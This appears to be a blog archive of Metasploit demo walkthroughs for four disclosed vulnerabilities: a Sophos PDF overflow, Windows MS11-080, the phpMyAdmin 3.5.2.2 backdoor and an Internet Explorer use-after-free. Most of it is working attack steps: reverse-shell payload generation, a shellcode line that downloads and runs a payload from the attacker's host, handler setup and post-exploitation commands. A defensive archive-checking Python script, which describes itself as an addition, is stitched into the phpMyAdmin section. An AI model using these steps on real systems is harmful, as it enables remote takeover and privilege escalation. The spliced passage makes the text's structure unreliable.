Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Sophos Anti-Virus Sophail PDF Vulnerability Metasploit Payload Demo

Timeline :

Vulnerabilities reported to vendor by Tavis Ormandy on 2012-09-10
Public release of the vulnerabilities by Tavis Ormandy on 2012-11-05
PoC provided by Tavis Ormandy on 2012-10-02

PoC provided by :

Tavis Ormandy

Reference(s) :

Full Disclosure
Sophail: Applied attacks against Sophos Antivirus
Sophos products and Tavis Ormandy
VU#662243

Affected version(s) :

Sophos products for Mac OS X
Sophos products for Windows
Sophos products for Linux

Tested on Mac OS X 10.8.2 with :

Sophos Anti-Virus for Mac Home Edition

Description :

This PoC demonstrates one of the Sophos product vulnerabilities reported by Tavis Ormandy. It exploits a PDF stack buffer overflow vulnerability present in the Sophos on-access scanner.

Demo :

1) Create a Mac OS X Metasploit payload:

msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > mac_os_x_payload

2) Modify Sophail shellcode.asm file with, for example:

.command: db "curl -s http://192.168.178.26/mac_os_x_payload > mac_os_x_payload | chmod u+x mac_os_x_payload && ./mac_os_x_payload", 0

3) Make

4) Upload index.html, exploit.bin and exploit.png on a web server

5) Initiate a Metasploit multi/handler

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

6) On the target surf index.html file

7) Exploit the session :)

sessions -i 1
id
/sbin/ifconfig
uname -a

MS11-080 Microsoft Windows AfdJoinLeaf Privilege Escalation Metasploit Demo

Timeline :

Vulnerability reported to Microsoft by Bo Zhou
Coordinated public release of the vulnerability on 2011-10-11
Metasploit PoC provided on 2012-10-02

PoC provided by :

Bo Zhou
Matteo Memelli
Spencer McIntyre

Reference(s) :

MS11-080
CVE-2011-2005

Affected version(s) :

Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2

Tested on Windows XP Pro SP3 with :

N/A

Description :

This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and, when triggered with a call to NtQueryIntervalProfile, will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring its own token to avoid causing system instability.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

sessions -i 1
getuid
sysinfo
background

use exploit/windows/local/ms11_080_afdjoinleaf
set SESSION 1
exploit

sessions -i 2
sysinfo
getuid

CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor Metasploit Demo

Timeline :

Backdoor discovered by Passerby on 2012-09-25
Vendor notified of the backdoor presence on 2012-09-25
Metasploit PoC provided on 2012-09-25

PoC provided by :

hdm

Reference(s) :

PMASA-2012-5
CVE-2012-5159
BID-51211

Affected version(s) :

phpMyAdmin-3.5.2.2-all-languages.zip downloaded from the cdnetworks-kr-1 SourceForge.net mirror.

Tested on Ubuntu 11.10 i386 with :

phpMyAdmin-3.5.2.2-all-languages.zip

Description :

This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.
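How a defender can check a mirror download against the project's published digest and file list before deploying it, flagging an injected file such as server_sync.php. This is an added example, not code from the original post or from Metasploit; the archive contents, manifest and trusted digest below are constructed stand-ins for the values a project would publish.

```python
"""Verify a downloaded distribution archive against a trusted digest and a
trusted file manifest, reporting files the manifest does not list.
The sample archives, manifest and digest are constructed for illustration."""
import hashlib
import io
import zipfile


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_zip(files: dict) -> bytes:
    """Build an in-memory zip from {name: content}; used to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def check_archive(archive_bytes: bytes, expected_sha256: str, manifest: set) -> dict:
    """Compare the archive digest with the trusted one and diff its file list
    against the trusted manifest. Any 'unexpected' entry deserves inspection."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        names = {n for n in zf.namelist() if not n.endswith("/")}
    return {
        "digest_ok": sha256_of(archive_bytes) == expected_sha256,
        "unexpected": sorted(names - manifest),
        "missing": sorted(manifest - names),
    }


# Constructed clean archive; its digest stands in for the project-published checksum.
CLEAN = build_zip({"phpMyAdmin-3.5.2.2-all-languages/index.php": b"<?php // clean\n"})
MANIFEST = {"phpMyAdmin-3.5.2.2-all-languages/index.php"}
TRUSTED_DIGEST = sha256_of(CLEAN)

# Constructed tampered archive: identical content plus one file not in the manifest.
TAMPERED = build_zip({
    "phpMyAdmin-3.5.2.2-all-languages/index.php": b"<?php // clean\n",
    "phpMyAdmin-3.5.2.2-all-languages/server_sync.php": b"<?php // not in manifest\n",
})

if __name__ == "__main__":
    print("clean:   ", check_archive(CLEAN, TRUSTED_DIGEST, MANIFEST))
    print("tampered:", check_archive(TAMPERED, TRUSTED_DIGEST, MANIFEST))
```

With a real download, replace TRUSTED_DIGEST and MANIFEST with the values published by the project (not by the mirror) and feed the downloaded bytes to check_archive.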

Commands :

use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

CVE-2012-4969 Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild and discovered by Eric Romang
First details of the vulnerability on 2012-09-14
Advanced details of the vulnerability provided by binjo on 2012-09-16
Metasploit PoC provided on 2012-09-17

PoC provided by :

unknown
eromang
binjo
sinn3r
juan vazquez

Reference(s) :

OSVDB-85532
Vulnhunt.com
eromang blog
Metasploit
CVE-2012-4969
MSA-2757760
MS12-063

Affected version(s) :

IE 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.

Commands :

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid